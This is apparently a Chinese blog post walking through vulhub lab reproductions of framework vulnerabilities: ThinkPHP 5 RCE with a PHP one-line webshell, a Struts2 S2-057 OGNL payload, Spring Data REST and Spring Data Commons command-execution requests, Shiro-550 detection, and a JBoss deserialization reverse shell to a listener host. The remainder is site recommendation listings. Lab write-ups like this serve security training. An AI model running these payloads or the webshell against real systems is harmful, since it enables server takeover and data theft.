常见框架漏洞

最新推荐文章于 2024-09-28 22:57:40 发布
最新推荐文章于 2024-09-28 22:57:40 发布
阅读量864 收藏 20
点赞数 23
文章标签: 架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/142467302
版权

thinkphp远程执行命令漏洞(5-rce)

1.开启环境

cd vulhub/thinkphp/5-rce

docker-compose up -d

2。访问靶场

3.执行whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

4.写入一句话木马

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

 S2-057远程执⾏代码漏洞

1.开启环境

cd vulhub/struts2/s2-057

docker-compose up -d

2.访问目录 /struts2-showcase

3.漏洞验证

在URL后面拼接如下payload

/struts2-showcase/${(123+123)}/actionChain1.action

发现中间的数字进行相加得到了246

4.将上⾯验证payload的值修改为我们的利⽤exp

/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

执行whoami  id等命令

CVE-2017-8046 

1.开启环境

cd vulhub/spring/CVE-2017-8046

docker-compose up -d

2.访问/customers/1

3.抓取数据包,使用PATCH请求来修改

数据包如下:

PATCH /customers/1 HTTP/1.1
Host: 47.121.191.208:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202
 
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

4.在docker中查看是否成功getshell

CVE-2018-1273 

1.开启环境

cd vulhub/spring/CVE-2018-1273

docker-compose up -d

2.访问/users目录

3。提交任意信息并抓包

将数据包内容改为如下:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

4.依旧是在docker中查看是否getshell

Shiro-550 

1.开启环境

cd vulhub/shiro/CVE-2016-4437

docker-compose up -d

2.验证Shiro框架
使用BurpSuite进行抓包,在请求包中的cookie字段中添加rememberMe=123:,看响应包header中是否返回rememberMe=deleteMe值,若有,则证明该系统使用了Shiro框架

3.使用工具

JBoss CVE-2013-4810 反序列化漏洞

1。开启环境

vulhub/jboss/JMXInvokerServlet-deserialization

2.访问/invoker/JMXInvokerServlet

若果下载了文件,那么就有可能存在漏洞

3.

#创建class⽂件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
#创建反序列化⽂件
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 47.121.191.208:6666
#监听 6666 端⼝
nc -lvvp 6666
#psot提交
curl http://47.121.191.208:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

获得shell

Zhong-Xin
关注
常见框架漏洞
weixin_57524749的博客
08-08 1704
Apache Struts 2 最初被称为 WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。​Struts2漏洞是一个远程命令执行漏洞和开放重定向漏洞。利用漏洞,黑客可发起远程攻击,不但可以窃取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,攻击者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作。
常见框架漏洞大全(附带修复方法)
C233333235的博客
08-07 711
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
常见框架漏洞复现
2401_86440467的博客
08-08 2378
使用Debian虚拟机,配置docker与docker-compose配置后下载vulhub靶场后发现,环境还是无法启动成功,重新打开终端输入docker hub加速服务如图成功后,启动容器 ,成功若想更改端口,则vim docker-compose.yml进入更改。
常见框架漏洞详解①!!
muyuchen110的博客
08-07 1011
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
常见框架漏洞 下(Weblogic、Jboss)
2301_76631050的博客
08-08 1196
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。
常见框架漏洞~~
网安小白
08-07 835
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
漏洞复现】常见框架漏洞复现 合集
qq_48368964的博客
08-07 1236
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
JAVA常用框架漏洞
小小猪的博客
08-13 3792
三大语言常用框架漏洞 Java框架 1.MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架,其主要就完成2件事情: 封装JDBC操作 利用反射打通Java类与SQL语句之间的相互转换 MyBatis的主要设计目的就是让我们对执行SQL语句时对输入输出的数据管理更加方便,所以方便地写出SQL和方便地获取SQL的执行结果才是MyBatis的核心竞争力。 ...
常见框架漏洞】Thinkphp(TP)、 struts2 、Spring、Shiro
m0_59151303的博客
08-07 1205
​ ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
Python常见安全漏洞及修复方法.pdf
06-29
修复此类漏洞的方法包括使用参数化查询而非字符串拼接构造SQL命令,使用ORM框架来避免直接操作SQL,以及对输入数据进行严格的验证和过滤。 二、XML解析相关漏洞 在解析XML文件时,如果文件来自不可信任的源,可能会...
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5567
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
20240925软考架构-------软考196-200答案解析
weixin_42678822的博客
09-25 296
解析:Lambda架构将批处理层和速度层分为两层,分别进行离线数据处理和实时数据处理,以便在不同的技术条件下处理不同类型的数据。解析:Lambda架构通过使用满足幺半群性质的数据View模型,将批处理层和速度层的输出进行统一管理,从而实现实时性。解析:Lambda架构需要开发并维护两套系统,一套负责批处理计算,另一套负责流处理计算,这样的开发维护成本相对较高。200、在开发和维护成本上,Lambda架构和Kappa架构的主要区别是( )。196、在选择架构时,更适合选择Kappa架构的情况是( )。
Kubernetes整体架构与核心组件
辅导自学转行
09-25 412
一个 Kubernetes 集群的机器节点有两种角色—— Master 和 Node,都可由一个或多个节点组成,且同一个节点可以既是 Master 也是 Node。Node 节点为工作机器,负责运行容器化应用。云控制器管理器(Cloud Controller Manager)允许你将你的集群连接到云提供商的 API 之上, 并将与该云平台交互的组件同与你的集群交互的组件分离开来。kube-scheduler 负责监视新创建的、未指定运行节点(node)的 Pods, 并选择节点来让 Pod 在上面运行。
YOLOv8改进,YOLOv8主干网络替换为GhostNetV3(2024年华为提出的轻量化架构,全网首发),助力涨点
最新发布
weixin_44779079的博客
09-28 187
GhostNetV3 提供了以下几种常见的模型权重,不同宽度缩放因子(Width Scaling): - 0.5x: 较小模型深度,用于资源更受限的场景。 - 1.0x: 标准模型。 - 1.3x: 模型深度比1.0x更深。 - 1.6x: 更大的模型版本,适用于计算资源较多的设备。
Kafka:架构与核心机制
J老熊
09-28 922
Apache Kafka 是一种高吞吐量的分布式消息队列,广泛应用于实时数据流处理和大数据架构中。本文将详细探讨 Kafka 的架构、Replica 管理、消息读取、分区策略、可靠性保障等核心机制。
Google BigTable架构详解
wendao76的专栏
09-25 1006
Bigtable的元数据也是按Tablet方式分片、分级存储的。在Chubby中只记录顶级元数据的Tablet位置或文件名,然后通过级联二级元数据的Tablet,最终可以定位到用户数据的Tablet。Bigtable的数据模型是一个稀疏的、分布式的、持久化的多维有序映射表。通过分布式架构、面向列的数据模型、稀疏性设计以及元数据管理等机制,Bigtable能够高效地处理大规模数据集,满足各种复杂的应用需求。Bigtable是Google开发的一个高性能、可扩展的分布式存储系统,用于管理大规模的结构化数据。
常见框架以及框架漏洞
10-17
常见的Web框架有Spring、Django、Flask等,这些框架都有其特点和优缺点。在使用这些框架时,需要注意一些常见漏洞,比如SQL注入、XSS攻击、CSRF攻击等。 其中,SQL注入是指攻击者通过在输入框中输入恶意的SQL语句,从而获取或篡改数据库中的数据。XSS攻击是指攻击者通过在网页中注入恶意脚本,从而获取用户的敏感信息或者进行其他恶意操作。CSRF攻击是指攻击者通过伪造用户的请求,从而进行一些非法操作。 为了防止这些漏洞,我们可以采取一些措施,比如使用参数化查询来防止SQL注入,使用输入验证和输出编码来防止XSS攻击,使用CSRF Token来防止CSRF攻击等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值